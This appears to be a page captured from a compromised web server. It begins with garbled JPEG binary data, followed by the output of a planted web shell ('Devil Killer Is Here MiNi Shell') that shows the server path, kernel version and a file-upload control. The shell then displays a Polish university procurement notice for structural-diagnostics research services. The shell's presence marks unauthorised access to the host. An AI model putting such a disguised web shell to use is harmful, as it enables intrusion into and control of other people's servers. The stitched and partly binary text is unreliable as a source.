JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210419/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210419/0003574501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00035745 z dnia 2021-04-19</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie usług dla WIMIR - KC-zp.272-100/21 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Górniczo-Hutnicza im. Stanisława Staszica w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001577</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Mickiewicza 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-059</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@agh.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dzp.agh.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie usług dla WIMIR - KC-zp.272-100/21 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c61c9468-a0f7-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00035745</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> POIR.01.01.01-00-0787/20-00 pt. „Opracowanie systemu do ultradźwiękowej diagnostyki i monitorowania konstrukcji” (akronim EQUIPUS). </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wniniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przyużyciuśrodków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającejpodadresemhttps://e-propublico.pl lub poczty elektronicznej.Korzystanie z Platformy przez Wykonawcę jestbezpłatne.Na Platformie postępowanie prowadzone jest pod nazwą: Wykonanie usług w zakresie: a) diagnostyki konstrukcji lotniczych; b) badań nieniszczących i analizy sygnałów; c) metod eksperymentalnych i diagnostyki konstrukcji 1; d) metod eksperymentalnych i diagnostyki konstrukcji 2 dla WIMiR - KC-zp.272-100/21Wykonawca przystępując do postępowania o udzieleniezamówienia publicznego, akceptuje warunkikorzystania z Platformy określone w Regulaminiezamieszczonym na stronie internetowejhttps://epropublico.pl oraz uznaje go za wiążący.Wykonawcazamierzający wziąć udział wpostępowaniu musiposiadać konto na Platformie.Do złożenia ofertykonieczne jest posiadanie przezosobę upoważnionądo reprezentowania Wykonawcy ważnegokwalifikowanegopodpisuelektronicznego, podpisuzaufanego lub podpisu osobistego.Zamawiającyokreśla następującewymagania sprzętowo –aplikacyjne pozwalające na korzystanie z Platformy:a)stały dostęp do sieciInternet;b) posiadaniedowolnej i aktywnej skrzynki poczty elektronicznej (e-mail),c)komputer zzainstalowanym systememoperacyjnym Windows 7 (lub nowszym) albo Linux,d)zainstalowanadowolnaprzeglądarka internetowa- Platforma współpracuje z najnowszymi, stabilnymiwersjami wszystkichgłównych przeglądarekinternetowych (Internet Explorer 10+, Microsoft Edge,MozillaFirefox, GoogleChrome, Opera),e)włączona obsługa JavaScript oraz Cookies.Zamawiającydopuszcza następującyformat przesyłanychdanych: pliki o wielkości do 20 MB w formatach: .pdf,.doc,.docx., .xlsx, .xml.Wpostępowaniu, wszelkieoświadczenia, wnioski, zawiadomienia oraz informacjeprzekazywane są zapośrednictwem Platformy(karta ”Wiadomości”). Za datę wpływu oświadczeń,wniosków, zawiadomieńoraz informacjiprzesłanych za pośrednictwem Platformy, przyjmuje się datęich zamieszczenia na Platformie.Ofertę,wraz ze stanowiącymi jej integralną część załącznikami, składasię pod rygoremnieważności w formieelektronicznej lub postaci elektronicznej za pośrednictwemPlatformy, podpisanąkwalifikowanympodpisem elektronicznym, podpisem zaufanym lub podpisemosobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogiokreślonewrozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r.wsprawieochrony osób fizycznych w związku z przetwarzaniem danych osobowych i wsprawieswobodnegoprzepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólnerozporządzenie oochroniedanych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym daneosobowe podaneprzezWykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisamikrajowymi.Szczegółoweokreślenie zasad związanych z obowiązkiem informacyjnym RODO zawarto wrozdziale27 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KC-zp.272-100/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie usługi w zakresie: diagnostyki konstrukcji lotniczych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">73110000-6 - Usługi badawcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">32 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie usługi w zakresie badań nieniszczących i analizy sygnałów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">73110000-6 - Usługi badawcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">32 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie usługi w zakresie: metod eksperymentalnych i diagnostyki konstrukcji 1. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">73110000-6 - Usługi badawcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">32 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie usługi w zakresie: metod eksperymentalnych i diagnostyki konstrukcji 2. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">73110000-6 - Usługi badawcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">32 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający, na podstawie art. 112 ustawy Pzp określa następujące warunki udziału w postępowaniu:Zdolność techniczna i zawodowa:Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował jedną osobą spełniającą poniższe wymagania:Zadanie częściowe nr 11)	Posiada minimum 1 rok doświadczenia w prowadzeniu badań naukowych z zakresu diagnostyki konstrukcji lotniczych. Posiada znajomość certyfikowanych metod NDT (m. in. metoda ultradźwiękowa) oraz wymogów technicznych i formalno-prawnych dotyczących diagnostyki struktur lotniczych.2)	Posiada minimum roczne doświadczenie naukowe w zagadnieniach związanych z badaniami nieniszczącymi i diagnostyką konstrukcji kompozytowych udokumentowane co najmniej 1 publikacją naukową z listy Journal Citation Reports (JCR). 3)	Wykonywał prace badawcze w ramach projektów badawczych.4)	Posiada znajomość obowiązujących regulacji prawnych w przemyśle lotniczym dot. dopuszczeń i certyfikacji metod pomiarowych wraz z certyfikatem III stopnia w zakresie metod badań nieniszczących w lotnictwie. 5)	Posiada wykształcenie wyższe - stopień naukowy doktora lub doktora habilitowanego. 6)	Posiada biegłą znajomość języka angielskiego w mowie i w piśmie.Zadanie częściowe nr 21)	Posiada minimum 1 rok doświadczenia doświadczenie naukowe w zakresie rozwoju procedur przetwarzania sygnałów na potrzeby diagnostyki konstrukcji. Posiada znajomość metod monitorowania stanu technicznego konstrukcji (Structural Health Monitoring, SHM) opartych o analizę propagacji fal sprężystych. 2)	Posiada min roczne doświadczenie w zakresie badań nieniszczących lub monitorowania stanu technicznego konstrukcji udokumentowane co najmniej 1 publikacją naukową w czasopismach z listy JCR. 3)	Wykonywał prace badawcze w ramach projektów badawczych.4)	Posiada wykształcenie wyższe, stopień naukowy doktora. 5)	Biegła znajomość języka angielskiego w mowie i w piśmie.Zadanie częściowe nr 31)	Posiada minimum 1 rok doświadczenia doświadczenie naukowe w planowaniu i realizacji badań eksperymentalnych z zakresu nieniszczącej diagnostyki konstrukcji metodami bazującymi na analizie propagacji fal sprężystych.2)	Posiada znajomość metodologii monitorowania stanu technicznego konstrukcji (Structural Health Monitoring, SHM). 3)	Posiada umiejętność zestawiania toru pomiarowego do pomiarów propagacji fal sprężystych. 4)	Posiada znajomość obsługi narzędzi laboratoryjnych: wibrometr laserowy (Polytec), generatory sygnałów arbitralnych, oscyloskopy i karty akwizycji sygnałów, wzmacniacze mocy. 5)	Posiada znajomość metod analizy danych pomiarowych pochodzących z testów bazujących na analizie propagacji fal sprężystych (środowisko Python, Matlab). 6)	Posiada umiejętność interpretacji danych pomiarowych w odniesieniu do typu badanej struktury i charakteru jej uszkodzenia.7)	Posiada umiejętność definiowania modeli obliczeniowych i wykonywania symulacji numerycznych propagacji fal sprężystych w dowolnym środowisku obliczeniowym (preferowane OnScale, Python, Matlab). 8)	Posiada minimum roczne doświadczenie naukowe w zakresie badań nieniszczących lub monitorowania stanu technicznego konstrukcji udokumentowane co najmniej 1 publikacją naukową z listy Journal Citation Reports (JCR). 9)	Posiada wykształcenie wyższe. 10)	Posiada biegłą znajomość języka angielskiego w mowie i w piśmie.Zadanie częściowe nr 41)	Posiada minimum roczne doświadczenie naukowe w planowaniu i realizacji badań eksperymentalnych z zakresu nieniszczącej diagnostyki konstrukcji metodami bazującymi na analizie propagacji fal sprężystych.2)	Posiada znajomość metodologii monitorowania stanu technicznego konstrukcji (Structural Health Monitoring, SHM). 3)	Posiada umiejętność zestawiania toru pomiarowego do pomiarów propagacji fal sprężystych. 4)	Posiada znajomość obsługi narzędzi laboratoryjnych: defektoskopy ultradźwiękowe, generatory sygnałów arbitralnych, oscyloskopy i karty akwizycji sygnałów, wzmacniacze mocy. 5)	Posiada znajomość metod analizy danych pomiarowych pochodzących z testów bazujących na analizie propagacji fal sprężystych (środowisko Python, Matlab). 6)	Posiada umiejętność interpretacji danych pomiarowych w odniesieniu do typu badanej struktury i charakteru jej uszkodzenia.7)	Posiada umiejętność definiowania modeli obliczeniowych i wykonywania symulacji numerycznych propagacji fal sprężystych w dowolnym środowisku obliczeniowym (preferowane OnScale, Python, Matlab). 8)	Posiada minimum roczne doświadczenie naukowe w zakresie badań nieniszczących lub monitorowania stanu technicznego konstrukcji udokumentowane co najmniej jedną publikacją naukową z listy Journal Citation Reports (JCR). 9)	Posiada wykształcenie wyższe. 10)	Posiada biegłą znajomość języka angielskiego w mowie i w piśmie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw wykluczenia, o których mowa w niniejszej SWZ,Zamawiającyżądaaby Wykonawca złożył wraz z ofertą: 1. Oświadczenie z art. 125 ust 1 Pzp. - oniepodleganiuwykluczeniu oraz spełnianiu warunków udziału. Aktualne na dzień składaniaofertoświadczenia wzakresie wskazanym w Załączniku Nr 2 i 3 do SWZ. Informacje zawartewoświadczeniach będąstanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniuzpostępowania oraz spełniawarunki udziału w postępowaniu. Oświadczenia te wykonawcaskładazgodnie ze wzoramistanowiącymi Załącznik Nr 2 i 3 do SWZ. W przypadku wspólnego ubieganiasię ozamówienie przezwykonawców oświadczenia, o którym mowa powyżej składa każdy zwykonawcówwspólnieubiegających się o zamówienie. Oświadczenia te, mają potwierdzać spełnianiewarunkówudziału wpostępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy zwykonawcówwykazujespełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.Wykonawca,wprzypadku polegania na zdolnościach lub sytuacji podmiotów 